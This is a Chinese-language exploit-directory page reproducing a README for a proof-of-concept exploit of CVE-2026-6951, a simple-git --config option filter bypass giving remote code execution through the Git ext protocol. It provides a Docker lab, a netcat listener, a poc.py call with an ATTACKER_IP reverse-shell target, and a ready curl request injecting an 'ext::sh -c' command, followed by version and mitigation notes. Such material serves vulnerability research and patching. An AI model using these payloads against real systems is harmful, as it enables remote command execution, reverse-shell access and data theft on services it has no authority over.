Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-6951 — CVE-2026-6951 的概念验证漏洞利用,该漏洞是 simple-git 的 --config 过滤器绕过,可通过 Git ext 协议实现 RCE,附带 Docker 实验环境和反向 shell 载荷。 | Kitploit
工具/GitHubGitHub/eqstlab/cve-2026-6951
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队远程访问工具Payload 开发
GitHubeqstlab/cve-2026-6951

CVE-2026-6951

CVE-2026-6951 的概念验证漏洞利用,该漏洞是 simple-git 的 --config 过滤器绕过,可通过 Git ext 协议实现 RCE,附带 Docker 实验环境和反向 shell 载荷。

查看仓库
111天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-6951 simple-git 远程代码执行

★ CVE-2026-6951 simple-git --config 选项过滤器绕过 RCE PoC ★

https://github.com/user-attachments/assets/4c992530-c5bb-4ff4-be5d-af0857eebb67


概述

CVE-2026-6951 是 simple-git 中的一个远程代码执行漏洞,由 CVE-2022-25912 的不完整修复导致。尽管 -c 选项已被阻止,但等效的 --config 选项未被正确限制。能够控制 Git 参数的攻击者可以启用 ext 协议,并通过 ext:: 仓库 URL 执行任意命令。


受影响版本

类别版本
存在漏洞simple-git 3.36.0 之前的版本
已修复simple-git 3.36.0 或更高版本

此环境使用 simple-git 3.35.2 和 @simple-git/argv-parser 1.0.3。


影响

  • 以 Node.js 应用程序的权限执行远程代码
  • 敏感文件泄露
  • 反向 shell 访问
  • 修改或删除应用程序数据

环境

构建并运行存在漏洞的环境。

docker build -t cve-2026-6951 .
docker run --rm -d --name cve-2026-6951 -p 9107:9107 cve-2026-6951

访问服务地址:

http://127.0.0.1:9107

检查服务状态。

curl -s http://127.0.0.1:9107/api/health

内置的示例仓库位于:

file:///srv/git/sample.git

PoC

在攻击者系统上启动监听器。

nc -lvnp 4444

运行漏洞利用脚本。

python3 poc.py http://127.0.0.1:9107 --lhost ATTACKER_IP --lport 4444

以下请求通过滥用未受限的 --config 选项和 Git ext 协议执行 id 命令。

curl -s -X POST http://127.0.0.1:9107/api/import \
  -H 'Content-Type: application/json' \
  --data-raw '{
    "repository":"ext::sh -c id% >&2",
    "name":"id-check",
    "options":["--config","protocol.ext.allow=always"],
    "environment":{}
  }'

缓解措施

  • 将 simple-git 升级到 3.36.0 或更高版本。
  • 不要将用户控制的 Git 选项直接传递给 simple-git。
  • 仅允许受信任的仓库 URL 协议,并拒绝 ext:: URL。
  • 对仓库 URL 和 Git 参数应用严格的允许列表验证。

分析

  • KR:
  • EN:
下载工具